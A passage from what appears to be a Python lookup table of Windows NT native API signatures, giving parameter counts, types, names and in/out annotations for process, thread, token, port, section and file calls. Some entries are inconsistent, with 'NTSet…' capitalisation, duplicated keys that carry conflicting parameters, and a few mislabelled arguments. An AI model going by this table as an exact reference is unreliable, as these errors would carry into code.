"POBJECT_ATTRIBUTES"], ["MutantHandle", "DesiredAccess", "ObjectAttributes"], "NTSTATUS", ["__OUT", "__IN", "__IN"]), "NtQueryMutant": (5, ["HANDLE", "MUTANT_INFORMATION_CLASS", "PVOID", "ULONG", "PULONG"], ["MutantHandle", "MutantInformationClass", "MutantInformation", "MutantInformationLength", "ResultLength"], "NTSTATUS", ["__IN", "__IN", "__OUT", "__IN", "__OUT_opt"]), "NtReleaseMutant": (2, ["HANDLE", "PLONG"], ["MutantHandle", "PreviousCount"], "NTSTATUS", ["__IN", "__OUT_opt"]), "NtAcceptConnectPort": (6, ["PHANDLE", "HANDLE", "PLPC_MESSAGE", "BOOLEAN", "PLPC_SECTION_OWNER_MEMORY", "PLPC_SECTION_MEMORY"], ["ServerPortHandle", "AlternativeReceivePortHandle", "ConnectionReply", "AcceptConnection", "ServerSharedMemory", "ClientSharedMemory"], "NTSTATUS", ["__OUT", "__IN_opt", "__IN", "__IN", "__IN_OUT_opt", "__OUT_opt"]), "NtCompleteConnectPort": (1, ["HANDLE"], ["PortHandle"], "NTSTATUS", ["__IN"]), "NtConnectPort": (8, ["PHANDLE", "PUNICODE_STRING", "PSECURITY_QUALITY_OF_SERVICE", "PLPC_SECTION_OWNER_MEMORY", "PLPC_SECTION_MEMORY", "PULONG", "PVOID", "PULONG"], ["ClientPortHandle", "ServerPortName", "SecurityQos", "ClientSharedMemory", "ServerSharedMemory", "MaximumMessageLength", "ConnectionInfo", "ConnectionInfoLength"], "NTSTATUS", ["__OUT", "__IN", "__IN", "__IN_OUT_opt", "__OUT_opt", "__OUT_opt", "__IN_opt", "__IN_opt"]), "NtCreatePort": (5, ["PHANDLE", "POBJECT_ATTRIBUTES", "ULONG", "ULONG", "PULONG"], ["PortHandle", "ObjectAttributes", "MaxConnectInfoLength", "MaxDataLength", "Reserved"], "NTSTATUS", ["__OUT", "__IN", "__IN", "__IN", "__IN_OUT_opt"]), "NtImpersonateClientOfPort": (2, ["HANDLE", "PLPC_MESSAGE"], ["PortHandle", "Request"], "NTSTATUS", ["__IN", "__IN"]), "NtListenPort": (2, ["HANDLE", "PLPC_MESSAGE"], ["PortHandle", "ConnectionRequest"], "NTSTATUS", ["__IN", "__OUT"]), "NtQueryInformationPort": (5, ["HANDLE", "PORT_INFORMATION_CLASS", "PVOID", "ULONG", "PULONG"], ["PortHandle", "PortInformationClass", "PortInformation", "Length", "ResultLength"], "NTSTATUS", ["__IN", "__IN", "__OUT", "__IN", "__OUT_opt"]), "NtReadRequestData": (6, ["HANDLE", "PLPC_MESSAGE", "ULONG", "PVOID", "ULONG", "PULONG"], ["PortHandle", "Request", "DataIndex", "Buffer", "Length", "ResultLength"], "NTSTATUS", ["__IN", "__IN", "__IN", "__OUT", "__IN", "__OUT_opt"]), "NtReplyPort": (2, ["HANDLE", "PLPC_MESSAGE"], ["PortHandle", "Reply"], "NTSTATUS", ["__IN", "__IN"]), "NtReplyWaitReceivePort": (4, ["HANDLE", "PHANDLE", "PLPC_MESSAGE", "PLPC_MESSAGE"], ["PortHandle", "ReceivePortHandle", "Reply", "IncomingRequest"], "NTSTATUS", ["__IN", "__OUT_opt", "__IN_opt", "__OUT"]), "NtReplyWaitReplyPort": (2, ["HANDLE", "PLPC_MESSAGE"], ["PortHandle", "Reply"], "NTSTATUS", ["__IN", "__IN_OUT"]), "NtRequestPort": (2, ["HANDLE", "PLPC_MESSAGE"], ["PortHandle", "Request"], "NTSTATUS", ["__IN", "__IN"]), "NtRequestWaitReplyPort": (3, ["HANDLE", "PLPC_MESSAGE", "PLPC_MESSAGE"], ["PortHandle", "Request", "IncomingReply"], "NTSTATUS", ["__IN", "__IN", "__OUT"]), "NtWriteRequestData": (6, ["HANDLE", "PLPC_MESSAGE", "ULONG", "PVOID", "ULONG", "PULONG"], ["PortHandle", "Request", "DataIndex", "Buffer", "Length", "ResultLength"], "NTSTATUS", ["__IN", "__IN", "__IN", "__IN", "__IN", "__OUT_opt"]), "NtCreateProcess": (8, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "HANDLE", "BOOLEAN", "HANDLE", "HANDLE", "HANDLE"], ["ProcessHandle", "DesiredAccess", "ObjectAttributes", "ParentProcess", "InheritObjectTable", "SectionHandle", "DebugPort", "ExceptionPort"], "NTSTATUS", ["__OUT", "__IN", "__IN_opt", "__IN", "__IN", "__IN_opt", "__IN_opt", "__IN_opt"]), "NtFlushInstructionCache": (3, ["HANDLE", "PVOID", "ULONG"], ["ProcessHandle", "BaseAddress", "NumberOfBytesToFlush"], "NTSTATUS", ["__IN", "__IN", "__IN"]), "NtOpenProcess": (4, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "PCLIENT_ID"], ["ProcessHandle", "AccessMask", "ObjectAttributes", "ClientId"], "NTSTATUS", ["__OUT", "__IN", "__IN", "__IN"]), "NtQueryInformationProcess": (5, ["HANDLE", "PROCESS_INFORMATION_CLASS", "PVOID", "ULONG", "PULONG"], ["ProcessHandle", "ProcessInformationClass", "ProcessInformation", "ProcessInformationLength", "ReturnLength"], "NTSTATUS", ["__IN", "__IN", "__OUT", "__IN", "__OUT"]), "NTSetInformationProcess": (4, ["HANDLE", "PROCESS_INFORMATION_CLASS", "PVOID", "ULONG"], ["ProcessHandle", "ProcessInformationClass", "ProcessInformation", "ProcessInformationLength"], "NTSTATUS", ["__IN", "__IN", "__IN", "__IN"]), "NtTerminateProcess": (2, ["HANDLE", "NTSTATUS"], ["ProcessHandle", "ExitStatus"], "NTSTATUS", ["__IN_opt", "__IN"]), "RtlCreateUserProcess": (10, ["PUNICODE_STRING", "ULONG", "PRTL_USER_PROCESS_PARAMETERS", "PSECURITY_DESCRIPTOR", "PSECURITY_DESCRIPTOR", "HANDLE", "BOOLEAN", "HANDLE", "HANDLE", "PRTL_USER_PROCESS_INFORMATION"], ["ImagePath", "ObjectAttributes", "ProcessParameters", "ProcessSecurityDescriptor", "ThreadSecurityDescriptor", "ParentProcess", "InheritHandles", "DebugPort", "ExceptionPort", "ProcessInformation"], "NTSTATUS", ["__IN", "__IN", "__IN_OUT", "__IN_opt", "__IN_opt", "__IN", "__IN", "__IN_opt", "__IN_opt", "__OUT"]), "NtCreateProfile": (9, ["PHANDLE", "HANDLE", "PVOID", "ULONG", "ULONG", "PVOID", "ULONG", "KPROFILE_SOURCE", "KAFFINITY"], ["ProfileHandle", "Process", "ImageBase", "ImageSize", "BucketSize", "Buffer", "BufferSize", "ProfileSource", "Affinity"], "NTSTATUS", ["__OUT", "__IN_opt", "__IN", "__IN", "__IN", "__IN", "__IN", "__IN", "__IN"]), "NtQueryIntervalProfile": (2, ["KPROFILE_SOURCE", "PULONG"], ["ProfileSource", "Interval"], "NTSTATUS", ["__IN", "__OUT"]), "NTSetIntervalProfile": (2, ["ULONG", "KPROFILE_SOURCE"], ["Interval", "Source"], "NTSTATUS", ["__IN", "__IN"]), "NTStartProfile": (1, ["HANDLE"], ["ProfileHandle"], "NTSTATUS", ["__IN"]), "NTStopProfile": (1, ["HANDLE"], ["ProfileHandle"], "NTSTATUS", ["__IN"]), "NtCreateSection": (7, ["PHANDLE", "ULONG", "POBJECT_ATTRIBUTES", "PLARGE_INTEGER", "ULONG", "ULONG", "HANDLE"], ["SectionHandle", "DesiredAccess", "ObjectAttributes", "MaximumSize", "PageAttributess", "SectionAttributes", "FileHandle"], "NTSTATUS", ["__OUT", "__IN", "__IN_opt", "__IN_opt", "__IN", "__IN", "__IN_opt"]), "NtExtendSection": (2, ["HANDLE", "PLARGE_INTEGER"], ["SectionHandle", "NewSectionSize"], "NTSTATUS", ["__IN", "__IN"]), "NtMapViewOfSection": (10, ["HANDLE", "HANDLE", "PVOID", "ULONG", "ULONG", "PLARGE_INTEGER", "PULONG", "DWORD", "ULONG", "ULONG"], ["SectionHandle", "ProcessHandle", "*BaseAddress", "ZeroBits", "CommitSize", "SectionOffset", "ViewSize", "InheritDisposition", "AllocationType", "Protect"], "NTSTATUS", ["__IN", "__IN", "__IN_OUT_opt", "__IN_opt", "__IN", "__IN_OUT_opt", "__IN_OUT", "__IN", "__IN_opt", "__IN"]), "NtOpenSection": (3, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES"], ["SectionHandle", "DesiredAccess", "ObjectAttributes"], "NTSTATUS", ["__OUT", "__IN", "__IN"]), "NtQuerySection": (5, ["HANDLE", "SECTION_INFORMATION_CLASS", "PVOID", "ULONG", "PULONG"], ["SectionHandle", "InformationClass", "InformationBuffer", "InformationBufferSize", "ResultLength"], "NTSTATUS", ["__IN", "__IN", "__OUT", "__IN", "__OUT_opt"]), "NtUnmapViewOfSection": (2, ["HANDLE", "PVOID"], ["ProcessHandle", "BaseAddress"], "NTSTATUS", ["__IN", "__IN"]), "NtCreateSemaphore": (5, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "ULONG", "ULONG"], ["SemaphoreHandle", "DesiredAccess", "ObjectAttributes", "InitialCount", "MaximumCount"], "NTSTATUS", ["__OUT", "__IN", "__IN_opt", "__IN", "__IN"]), "NtOpenSemaphore": (3, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES"], ["SemaphoreHandle", "DesiredAccess", "ObjectAttributes"], "NTSTATUS", ["__OUT", "__IN", "__IN"]), "NtQuerySemaphore": (5, ["HANDLE", "SEMAPHORE_INFORMATION_CLASS", "PVOID", "ULONG", "PULONG"], ["SemaphoreHandle", "SemaphoreInformationClass", "SemaphoreInformation", "SemaphoreInformationLength", "ReturnLength"], "NTSTATUS", ["__IN", "__IN", "__OUT", "__IN", "__OUT_opt"]), "NtReleaseSemaphore": (3, ["HANDLE", "ULONG", "PULONG"], ["SemaphoreHandle", "ReleaseCount", "PreviousCount"], "NTSTATUS", ["__IN", "__IN", "__OUT_opt"]), "NtCreateSymbolicLinkObject": (4, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "PUNICODE_STRING"], ["pHandle", "DesiredAccess", "ObjectAttributes", "DestinationName"], "NTSTATUS", ["__OUT", "__IN", "__IN", "__IN"]), "NtOpenSymbolicLinkObject": (3, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES"], ["pHandle", "DesiredAccess", "ObjectAttributes"], "NTSTATUS", ["__OUT", "__IN", "__IN"]), "NtQuerySymbolicLinkObject": (3, ["HANDLE", "PUNICODE_STRING", "PULONG"], ["SymbolicLinkHandle", "pLinkName", "pDataWritten"], "NTSTATUS", ["__IN", "__OUT", "__OUT_opt"]), "NtAlertResumeThread": (2, ["HANDLE", "PULONG"], ["ThreadHandle", "SuspendCount"], "NTSTATUS", ["__IN", "__OUT"]), "NtContinue": (2, ["PCONTEXT", "BOOLEAN"], ["ThreadContext", "RaiseAlert"], "NTSTATUS", ["__IN", "__IN"]), "NtCreateThread": (8, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "HANDLE", "PCLIENT_ID", "PCONTEXT", "PINITIAL_TEB", "BOOLEAN"], ["ThreadHandle", "DesiredAccess", "ObjectAttributes", "ProcessHandle", "ClientId", "ThreadContext", "InitialTeb", "CreateSuspended"], "NTSTATUS", ["__OUT", "__IN", "__IN_opt", "__IN", "__OUT", "__IN", "__IN", "__IN"]), "NtCurrentTeb": (0, [], [], "PTEB", []), "NtDelayExecution": (2, ["BOOLEAN", "PLARGE_INTEGER"], ["Alertable", "DelayInterval"], "NTSTATUS", ["__IN", "__IN"]), "NtImpersonateThread": (3, ["HANDLE", "HANDLE", "PSECURITY_QUALITY_OF_SERVICE"], ["ThreadHandle", "ThreadToImpersonate", "SecurityQualityOfService"], "NTSTATUS", ["__IN", "__IN", "__IN"]), "NtOpenThread": (4, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "PCLIENT_ID"], ["ThreadHandle", "AccessMask", "ObjectAttributes", "ClientId"], "NTSTATUS", ["__OUT", "__IN", "__IN", "__IN"]), "NtQueryInformationThread": (5, ["HANDLE", "THREAD_INFORMATION_CLASS", "PVOID", "ULONG", "PULONG"], ["ThreadHandle", "ThreadInformationClass", "ThreadInformation", "ThreadInformationLength", "ReturnLength"], "NTSTATUS", ["__IN", "__IN", "__OUT", "__IN", "__OUT_opt"]), "NtRegisterThreadTerminatePort": (1, ["HANDLE"], ["PortHandle"], "NTSTATUS", ["__IN"]), "NtResumeThread": (2, ["HANDLE", "PULONG"], ["ThreadHandle", "SuspendCount"], "NTSTATUS", ["__IN", "__OUT_opt"]), "NTSetInformationThread": (4, ["HANDLE", "THREAD_INFORMATION_CLASS", "PVOID", "ULONG"], ["ThreadHandle", "ThreadInformationClass", "ThreadInformation", "ThreadInformationLength"], "NTSTATUS", ["__IN", "__IN", "__IN", "__IN"]), "NTSuspendThread": (2, ["HANDLE", "PULONG"], ["ThreadHandle", "PreviousSuspendCount"], "NTSTATUS", ["__IN", "__OUT_opt"]), "NtTerminateThread": (2, ["HANDLE", "NTSTATUS"], ["ThreadHandle", "ExitStatus"], "NTSTATUS", ["__IN", "__IN"]), "NtYieldExecution": (0, [], [], "NTSTATUS", []), "RtlCreateUserThread": (10, ["HANDLE", "PSECURITY_DESCRIPTOR", "BOOLEAN", "ULONG", "PULONG", "PULONG", "PVOID", "PVOID", "PHANDLE", "PCLIENT_ID"], ["ProcessHandle", "SecurityDescriptor", "CreateSuspended", "StackZeroBits", "StackReserved", "StackCommit", "StartAddress", "StartParameter", "ThreadHandle", "ClientID"], "NTSTATUS", ["__IN", "__IN_opt", "__IN", "__IN", "__IN_OUT", "__IN_OUT", "__IN", "__IN_opt", "__OUT", "__OUT"]), "NtCancelTimer": (2, ["HANDLE", "PBOOLEAN"], ["TimerHandle", "CurrentState"], "NTSTATUS", ["__IN", "__OUT_opt"]), "NtCreateTimer": (4, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "TIMER_TYPE"], ["TimerHandle", "DesiredAccess", "ObjectAttributes", "TimerType"], "NTSTATUS", ["__OUT", "__IN", "__IN_opt", "__IN"]), "NtOpenTimer": (3, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES"], ["TimerHandle", "DesiredAccess", "ObjectAttributes"], "NTSTATUS", ["__OUT", "__IN", "__IN"]), "NtQueryTimer": (5, ["HANDLE", "TIMER_INFORMATION_CLASS", "PVOID", "ULONG", "PULONG"], ["TimerHandle", "TimerInformationClass", "TimerInformation", "TimerInformationLength", "ReturnLength"], "NTSTATUS", ["__IN", "__IN", "__OUT", "__IN", "__OUT_opt"]), "NTSetTimer": (7, ["HANDLE", "PLARGE_INTEGER", "PTIMER_APC_ROUTINE", "PVOID", "BOOLEAN", "LONG", "PBOOLEAN"], ["TimerHandle", "DueTime", "TimerApcRoutine", "TimerContext", "ResumeTimer", "Period", "PreviousState"], "NTSTATUS", ["__IN", "__IN", "__IN_opt", "__IN_opt", "__IN", "__IN_opt", "__OUT_opt"]), "NtAdjustGroupsToken": (6, ["HANDLE", "BOOLEAN", "PTOKEN_GROUPS", "ULONG", "PTOKEN_GROUPS", "PULONG"], ["TokenHandle", "ResetToDefault", "TokenGroups", "PreviousGroupsLength", "PreviousGroups", "RequiredLength"], "NTSTATUS", ["__IN", "__IN", "__IN", "__IN", "__OUT_opt", "__OUT_opt"]), "NtAdjustPrivilegesToken": (6, ["HANDLE", "BOOLEAN", "PTOKEN_PRIVILEGES", "ULONG", "PTOKEN_PRIVILEGES", "PULONG"], ["TokenHandle", "DisableAllPrivileges", "TokenPrivileges", "PreviousPrivilegesLength", "PreviousPrivileges", "RequiredLength"], "NTSTATUS", ["__IN", "__IN", "__IN", "__IN", "__OUT_opt", "__OUT_opt"]), "NtCreateToken": (13, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "TOKEN_TYPE", "PLUID", "PLARGE_INTEGER", "PTOKEN_USER", "PTOKEN_GROUPS", "PTOKEN_PRIVILEGES", "PTOKEN_OWNER", "PTOKEN_PRIMARY_GROUP", "PTOKEN_DEFAULT_DACL", "PTOKEN_SOURCE"], ["TokenHandle", "DesiredAccess", "ObjectAttributes", "TokenType", "AuthenticationId", "ExpirationTime", "TokenUser", "TokenGroups", "TokenPrivileges", "TokenOwner", "TokenPrimaryGroup", "TokenDefaultDacl", "TokenSource"], "NTSTATUS", ["__OUT", "__IN", "__IN", "__IN", "__IN", "__IN", "__IN", "__IN", "__IN", "__IN", "__IN", "__IN", "__IN"]), "NtDuplicateToken": (6, ["HANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "SECURITY_IMPERSONATION_LEVEL", "TOKEN_TYPE", "PHANDLE"], ["ExistingToken", "DesiredAccess", "ObjectAttributes", "ImpersonationLevel", "TokenType", "NewToken"], "NTSTATUS", ["__IN", "__IN", "__IN_opt", "__IN", "__IN", "__OUT"]), "NtOpenProcessToken": (3, ["HANDLE", "ACCESS_MASK", "PHANDLE"], ["ProcessHandle", "DesiredAccess", "TokenHandle"], "NTSTATUS", ["__IN", "__IN", "__OUT"]), "NtOpenThreadToken": (4, ["HANDLE", "ACCESS_MASK", "BOOLEAN", "PHANDLE"], ["ThreadHandle", "DesiredAccess", "OpenAsSelf", "TokenHandle"], "NTSTATUS", ["__IN", "__IN", "__IN", "__OUT"]), "NtQueryInformationToken": (5, ["HANDLE", "TOKEN_INFORMATION_CLASS", "PVOID", "ULONG", "PULONG"], ["TokenHandle", "TokenInformationClass", "TokenInformation", "TokenInformationLength", "ReturnLength"], "NTSTATUS", ["__IN", "__IN", "__OUT", "__IN", "__OUT"]), "NTSetInformationToken": (4, ["HANDLE", "TOKEN_INFORMATION_CLASS", "PVOID", "ULONG"], ["TokenHandle", "TokenInformationClass", "TokenInformation", "TokenInformationLength"], "NTSTATUS", ["__IN", "__IN", "__OUT", "__IN"]), "NtAccessCheckAndAuditAlarm": (11, ["PUNICODE_STRING", "HANDLE", "PUNICODE_STRING", "PUNICODE_STRING", "PSECURITY_DESCRIPTOR", "ACCESS_MASK", "PGENERIC_MAPPING", "BOOLEAN", "PULONG", "PULONG", "PBOOLEAN"], ["SubsystemName", "ObjectHandle", "ObjectTypeName", "ObjectName", "SecurityDescriptor", "DesiredAccess", "GenericMapping", "ObjectCreation", "GrantedAccess", "AccessStatus", "GenerateOnClose"], "NTSTATUS", ["__IN_opt", "__IN_opt", "__IN_opt", "__IN_opt", "__IN", "__IN", "__IN", "__IN", "__OUT", "__OUT", "__OUT"]), "NtCloseObjectAuditAlarm": (3, ["PUNICODE_STRING", "HANDLE", "BOOLEAN"], ["SubsystemName", "ObjectHandle", "GenerateOnClose"], "NTSTATUS", ["__IN", "__IN_opt", "__IN"]), "NtDeleteObjectAuditAlarm": (3, ["PUNICODE_STRING", "HANDLE", "BOOLEAN"], ["SubsystemName", "ObjectHandle", "GenerateOnClose"], "NTSTATUS", ["__IN", "__IN_opt", "__IN"]), "NtOpenObjectAuditAlarm": (12, ["PUNICODE_STRING", "PHANDLE", "PUNICODE_STRING", "PUNICODE_STRING", "PSECURITY_DESCRIPTOR", "HANDLE", "ACCESS_MASK", "ACCESS_MASK", "PPRIVILEGE_SET", "BOOLEAN", "BOOLEAN", "PBOOLEAN"], ["SubsystemName", "ObjectHandle", "ObjectTypeName", "ObjectName", "SecurityDescriptor", "ClientToken", "DesiredAccess", "GrantedAccess", "Privileges", "ObjectCreation", "AccessGranted", "GenerateOnClose"], "NTSTATUS", ["__IN_opt", "__IN_opt", "__IN_opt", "__IN_opt", "__IN_opt", "__IN", "__IN", "__IN", "__IN_opt", "__IN", "__IN", "__OUT_opt"]), "NtPrivilegeObjectAuditAlarm": (6, ["PUNICODE_STRING", "HANDLE", "HANDLE", "ULONG", "PPRIVILEGE_SET", "BOOLEAN"], ["SubsystemName", "ObjectHandle", "ClientToken", "DesiredAccess", "ClientPrivileges", "AccessGranted"], "NTSTATUS", ["__IN_opt", "__IN_opt", "__IN", "__IN", "__IN", "__IN"]), "NtPrivilegedServiceAuditAlarm": (5, ["PUNICODE_STRING", "PUNICODE_STRING", "HANDLE", "PPRIVILEGE_SET", "BOOLEAN"], ["SubsystemName", "ServiceName", "ClientToken", "ClientPrivileges", "AccessGranted"], "NTSTATUS", ["__IN_opt", "__IN_opt", "__IN", "__IN", "__IN"]), "NtAccessCheck": (8, ["PSECURITY_DESCRIPTOR", "HANDLE", "ACCESS_MASK", "PGENERIC_MAPPING", "PPRIVILEGE_SET", "PULONG", "PACCESS_MASK", "PNTSTATUS"], ["SecurityDescriptor", "ClientToken", "DesiredAccess", "GenericMapping", "RequiredPrivilegesBuffer", "BufferLength", "GrantedAccess", "AccessStatus"], "NTSTATUS", ["__IN", "__IN", "__IN", "__IN_opt", "__OUT", "__IN_OUT", "__OUT", "__OUT"]), "NtAllocateLocallyUniqueId": (1, ["PLUID"], ["LocallyUniqueId"], "NTSTATUS", ["__OUT"]), "NtAllocateUuids": (3, ["PLARGE_INTEGER", "PULONG", "PULONG"], ["Time", "Range", "Sequence"], "NTSTATUS", ["__OUT", "__OUT", "__OUT"]), "NtPrivilegeCheck": (3, ["HANDLE", "PPRIVILEGE_SET", "PBOOLEAN"], ["TokenHandle", "RequiredPrivileges", "Result"], "NTSTATUS", ["__IN", "__IN", "__IN"]), "NtQuerySystemInformation": (4, ["SYSTEM_INFORMATION_CLASS", "PVOID", "ULONG", "PULONG"], ["SystemInformationClass", "SystemInformation", "SystemInformationLength", "ReturnLength"], "NTSTATUS", ["__IN", "__OUT", "__IN", "__OUT_opt"]), "NTSetSystemInformation": (3, ["SYSTEM_INFORMATION_CLASS", "PVOID", "ULONG"], ["SystemInformationClass", "SystemInformation", "SystemInformationLength"], "NTSTATUS", ["__IN", "__IN", "__IN"]), "NtGetTickCount": (0, [], [], "ULONG", []), "NtQueryPerformanceCounter": (2, ["PLARGE_INTEGER", "PLARGE_INTEGER"], ["PerformanceCounter", "PerformanceFrequency"], "NTSTATUS", ["__OUT", "__OUT_opt"]), "NtQuerySystemTime": (1, ["PLARGE_INTEGER"], ["SystemTime"], "NTSTATUS", ["__OUT"]), "NtQueryTimerResolution": (3, ["PULONG", "PULONG", "PULONG"], ["MinimumResolution", "MaximumResolution", "CurrentResolution"], "NTSTATUS", ["__OUT", "__OUT", "__OUT"]), "NTSetSystemTime": (2, ["PLARGE_INTEGER", "PLARGE_INTEGER"], ["SystemTime", "PreviousTime"], "NTSTATUS", ["__IN", "__OUT_opt"]), "NTSetTimerResolution": (3, ["ULONG", "BOOLEAN", "PULONG"], ["DesiredResolution", "SetResolution", "CurrentResolution"], "NTSTATUS", ["__IN", "__IN", "__OUT"]), "RtlTimeFieldsToTime": (2, ["PTIME_FIELDS", "PLARGE_INTEGER"], ["TimeFields", "Time"], "BOOLEAN", ["__IN", "__OUT"]), "RtlTimeToTimeFields": (2, ["PLARGE_INTEGER", "PTIME_FIELDS"], ["Time", "TimeFields"], "VOID", ["__IN", "__OUT"]), "NtAllocateVirtualMemory": (6, ["HANDLE", "PVOID", "ULONG_PTR", "PSIZE_T", "ULONG", "ULONG"], ["ProcessHandle", "*BaseAddress", "ZeroBits", "RegionSize", "AllocationType", "Protect"], "NTSTATUS", ["__IN", "__IN_OUT", "__IN", "__IN_OUT", "__IN", "__IN"]), "NtClose": (1, ["HANDLE"], ["Handle"], "NTSTATUS", ["__IN"]), "NtCreateFile": (11, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "PIO_STATUS_BLOCK", "PLARGE_INTEGER", "ULONG", "ULONG", "ULONG", "ULONG", "PVOID", "ULONG"], ["FileHandle", "DesiredAccess", "ObjectAttributes", "IoStatusBlock", "AllocationSize", "FileAttributes", "ShareAccess", "CreateDisposition", "CreateOptions", "EaBuffer", "EaLength"], "NTSTATUS", ["__OUT", "__IN", "__IN", "__OUT", "__IN_opt", "__IN", "__IN", "__IN", "__IN", "__IN_opt", "__IN"]), "NtCreateSection": (7, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "PLARGE_INTEGER", "ULONG", "ULONG", "HANDLE"], ["SectionHandle", "DesiredAccess", "ObjectAttributes", "MaximumSize", "SectionPageProtection", "AllocationAttributes", "FileHandle"], "NTSTATUS", ["__OUT", "__IN", "__IN_opt", "__IN_opt", "__IN", "__IN", "__IN_opt"]), "NtDeviceIoControlFile": (10, ["HANDLE", "HANDLE", "PIO_APC_ROUTINE", "PVOID", "PIO_STATUS_BLOCK", "ULONG", "PVOID", "ULONG", "PVOID", "ULONG"], ["FileHandle", "Event", "ApcRoutine", "ApcContext", "IoStatusBlock", "IoControlCode", "InputBuffer", "InputBufferLength", "OutputBuffer", "OutputBufferLength"], "NTSTATUS", ["__IN", "__IN_opt", "__IN_opt", "__IN_opt", "__OUT", "__IN", "__IN_opt", "__IN", "__OUT_opt", "__IN"]), "NtDuplicateToken": (6, ["HANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "BOOLEAN", "TOKEN_TYPE", "PHANDLE"], ["ExistingTokenHandle", "DesiredAccess", "ObjectAttributes", "EffectiveOnly", "TokenType", "NewTokenHandle"], "NTSTATUS", ["__IN", "__IN", "__IN", "__IN", "__IN", "__OUT"]), "NtFlushBuffersFileEx": (5, ["HANDLE", "ULONG", "PVOID", "ULONG", "PIO_STATUS_BLOCK"], ["FileHandle", "Flags", "Parameters", "ParametersSize", "IoStatusBlock"], "NTSTATUS", ["__IN", "__IN", "__IN", "__IN", "__OUT"]), "NtFreeVirtualMemory": (4, ["HANDLE", "PVOID", "PSIZE_T", "ULONG"], ["ProcessHandle", "*BaseAddress", "RegionSize", "FreeType"], "NTSTATUS", ["__IN", "__IN_OUT", "__IN_OUT", "__IN"]), "NtFsControlFile": (10, ["HANDLE", "HANDLE", "PIO_APC_ROUTINE", "PVOID", "PIO_STATUS_BLOCK", "ULONG", "PVOID", "ULONG", "PVOID", "ULONG"], ["FileHandle", "Event", "ApcRoutine", "ApcContext", "IoStatusBlock", "FsControlCode", "InputBuffer", "InputBufferLength", "OutputBuffer", "OutputBufferLength"], "NTSTATUS", ["__IN", "__IN_opt", "__IN_opt", "__IN_opt", "__OUT", "__IN", "__IN_opt", "__IN", "__OUT_opt", "__IN"]), "NtLockFile": (10, ["HANDLE", "HANDLE", "PIO_APC_ROUTINE", "PVOID", "PIO_STATUS_BLOCK", "PLARGE_INTEGER", "PLARGE_INTEGER", "ULONG", "BOOLEAN", "BOOLEAN"], ["FileHandle", "Event", "ApcRoutine", "ApcContext", "IoStatusBlock", "ByteOffset", "Length", "Key", "FailImmediately", "ExclusiveLock"], "NTSTATUS", ["__IN", "__IN_opt", "__IN_opt", "__IN_opt", "__OUT", "__IN", "__IN", "__IN", "__IN", "__IN"]), "NtOpenFile": (6, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "PIO_STATUS_BLOCK", "ULONG", "ULONG"], ["FileHandle", "DesiredAccess", "ObjectAttributes", "IoStatusBlock", "ShareAccess", "OpenOptions"], "NTSTATUS", ["__OUT", "__IN", "__IN", "__OUT", "__IN", "__IN"]), "NtOpenProcessToken": (3, ["HANDLE", "ACCESS_MASK", "PHANDLE"], ["ProcessHandle", "DesiredAccess", "TokenHandle"], "NTSTATUS", ["__IN", "__IN", "__OUT"]), "NtOpenProcessTokenEx": (4, ["HANDLE", "ACCESS_MASK", "ULONG", "PHANDLE"], ["ProcessHandle", "DesiredAccess", "HandleAttributes", "TokenHandle"], "NTSTATUS", ["__IN", "__IN", "__IN", "__OUT"]), "NtOpenThreadToken": (4, ["HANDLE", "ACCESS_MASK", "BOOLEAN", "PHANDLE"], ["ThreadHandle", "DesiredAccess", "OpenAsSelf", "TokenHandle"], "NTSTATUS", ["__IN", "__IN", "__IN", "__OUT"]), "NtOpenThreadTokenEx": (5, ["HANDLE", "ACCESS_MASK", "BOOLEAN", "ULONG", "PHANDLE"], ["ThreadHandle", "DesiredAccess", "OpenAsSelf", "HandleAttributes", "TokenHandle"], "NTSTATUS", ["__IN", "__IN", "__IN", "__IN", "__OUT"]), "NtPrivilegeCheck": (3, ["HANDLE", "PPRIVILEGE_SET", "PBOOLEAN"], ["ClientToken", "RequiredPrivileges", "Result"], "NTSTATUS", ["__IN", "__IN_OUT", "__OUT"]), "NtQueryDirectoryFile": (11, ["HANDLE", "HANDLE", "PIO_APC_ROUTINE", "PVOID", "PIO_STATUS_BLOCK", "PVOID", "ULONG", "FILE_INFORMATION_CLASS", "BOOLEAN", "PUNICODE_STRING", "BOOLEAN"], ["FileHandle", "Event", "ApcRoutine", "ApcContext", "IoStatusBlock", "FileInformation", "Length", "FileInformationClass", "ReturnSingleEntry", "FileName", "RestartScan"], "NTSTATUS", ["__IN", "__IN_opt", "__IN_opt", "__IN_opt", "__OUT", "__OUT", "__IN", "__IN", "__IN", "__IN_opt", "__IN"]), "NtQueryDirectoryFileEx": (10, ["HANDLE", "HANDLE", "PIO_APC_ROUTINE", "PVOID", "PIO_STATUS_BLOCK", "PVOID", "ULONG", "FILE_INFORMATION_CLASS", "ULONG", "PUNICODE_STRING"], ["FileHandle", "Event", "ApcRoutine", "ApcContext", "IoStatusBlock", "FileInformation", "Length", "FileInformationClass", "QueryFlags", "FileName"], "NTSTATUS", ["__IN", "__IN_opt", "__IN_opt", "__IN_opt", "__OUT", "__OUT", "__IN", "__IN", "__IN", "__IN_opt"]), "NtQueryInformationFile": (5, ["HANDLE", "PIO_STATUS_BLOCK", "PVOID", "ULONG", "FILE_INFORMATION_CLASS"], ["FileHandle", "IoStatusBlock", "FileInformation", "Length", "FileInformationClass"], "NTSTATUS", ["__IN", "__OUT", "__OUT", "__IN", "__IN"]), "NtQueryInformationToken": (5, ["HANDLE", "TOKEN_INFORMATION_CLASS", "PVOID", 